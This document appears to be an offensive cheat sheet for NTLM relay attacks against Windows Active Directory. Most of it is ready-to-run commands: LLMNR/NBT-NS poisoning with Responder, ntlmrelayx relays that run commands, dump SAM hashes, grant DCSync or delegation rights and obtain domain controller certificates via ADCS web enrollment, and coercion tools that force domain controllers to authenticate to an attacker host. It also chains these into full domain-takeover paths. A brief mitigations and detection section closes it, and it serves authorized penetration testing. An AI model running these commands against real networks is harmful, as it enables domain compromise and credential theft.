NTLM-RELAY
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
NTLM relay forwards a victim's NTLM authentication to a third target instead of cracking it. Combined with coercion (PetitPotam, PrinterBug) it enables AD takeover paths (e.g. relay to ADCS/LDAP). This sheet covers ntlmrelayx, coercion tools, and mitigations. Authorized engagements only.
CORE CONCEPT#
# Victim authenticates to attacker -> attacker relays to Target # Requires: SMB signing OFF (SMB relay) or LDAP signing/channel # binding not enforced (LDAP relay). Self-relay is patched (CVE-2019-1384).
FIND RELAY TARGETS#
nxc smb <subnet> --gen-relay-list relaytargets.txt
# Hosts with SMB signing disabled
nxc ldap <dc> -u u -p p -M ldap-checker
# LDAP signing / channel binding state
RESPONDER (POISON + CAPTURE)#
responder -I eth0 # Poison LLMNR/NBT-NS/mDNS responder -I eth0 -w # With WPAD rogue proxy # IMPORTANT: disable Responder's SMB/HTTP servers when relaying, # so ntlmrelayx receives the auth instead: # edit /etc/responder/Responder.conf -> SMB = Off, HTTP = Off responder -I eth0 -rdw # Common combo w/ servers off
NTLMRELAYX - SMB RELAY#
impacket-ntlmrelayx -tf relaytargets.txt -smb2support
impacket-ntlmrelayx -t smb://<host> -smb2support -i
# -i = interactive SMB client shell
impacket-ntlmrelayx -t smb://<host> -c "whoami" # Exec command
impacket-ntlmrelayx -tf targets.txt --dump-sam # Dump SAM if admin
NTLMRELAYX - LDAP / LDAPS RELAY#
impacket-ntlmrelayx -t ldap://<dc> --escalate-user <lowpriv>
# Grant DCSync-like rights
impacket-ntlmrelayx -t ldaps://<dc> --delegate-access
# RBCD - resource-based delegation
impacket-ntlmrelayx -t ldap://<dc> --add-computer ATTACKER$
# Add a computer account
NTLMRELAYX - ADCS (ESC8)#
impacket-ntlmrelayx -t http://<ca>/certsrv/certfnsh.asp \ -smb2support --adcs --template DomainController # Relays machine/user auth to the CA web enrollment endpoint and # obtains a certificate -> then PKINIT to get a TGT for that identity
COERCION (FORCE AUTH)#
# PetitPotam (MS-EFSRPC), often unauthenticated pre-patch: impacket-petitpotam <attacker-ip> <dc> # PrinterBug (MS-RPRN): python3 printerbug.py corp.lu/u:p@<target> <attacker-ip> # DFSCoerce (MS-DFSNM): python3 dfscoerce.py -u u -p p <attacker-ip> <dc> # Coercer (multi-method): coercer coerce -u u -p p -l <attacker-ip> -t <target>
FULL CHAINS#
# ESC8: coerce DC auth -> relay to CA -> cert -> DA # term1: ntlmrelayx -t http://ca/certsrv/certfnsh.asp --adcs \ # --template DomainController -smb2support # term2: petitpotam <attacker-ip> <dc-fqdn> # RBCD: relay machine auth to LDAP -> --delegate-access -> # configure RBCD -> S4U -> impersonate admin on victim
MITIGATIONS (DEFENSIVE)#
# - Enforce SMB signing (required) on all hosts # - Enforce LDAP signing + LDAP channel binding on DCs # - Enable EPA on ADCS web enrollment; disable HTTP enrollment # - Disable LLMNR, NBT-NS, mDNS via GPO # - Patch PetitPotam/PrinterBug; restrict RPC coercion surfaces # - Deploy WPAD via DNS to a valid host (block rogue WPAD)
EXAMPLES#
# Generate targets, then relay coerced DC auth to LDAP for RBCD nxc smb 10.0.0.0/24 --gen-relay-list t.txt impacket-ntlmrelayx -t ldap://dc --delegate-access -smb2support python3 printerbug.py corp.lu/u:p@dc 10.10.10.5 # ESC8 certificate theft from a coerced domain controller impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp --adcs \ --template DomainController -smb2support impacket-petitpotam 10.10.10.5 dc.corp.lu
NOTES#
- SMB relay needs signing OFF on the *target*; LDAP relay needs signing/channel-binding NOT enforced on the DC - You cannot relay SMB->SMB back to the originating host (patched) - ESC8 is the highest-impact common chain: coercion + ADCS web enroll - Pair with ADCS-ATTACKS.txt (ESC1-ESC16) and LDAP-ENUM.txt - Detection: watch for anomalous machine auth to CA/LDAP, EFSRPC/RPRN calls, and NTLM from unexpected sources (see DEFENDER-KQL.txt)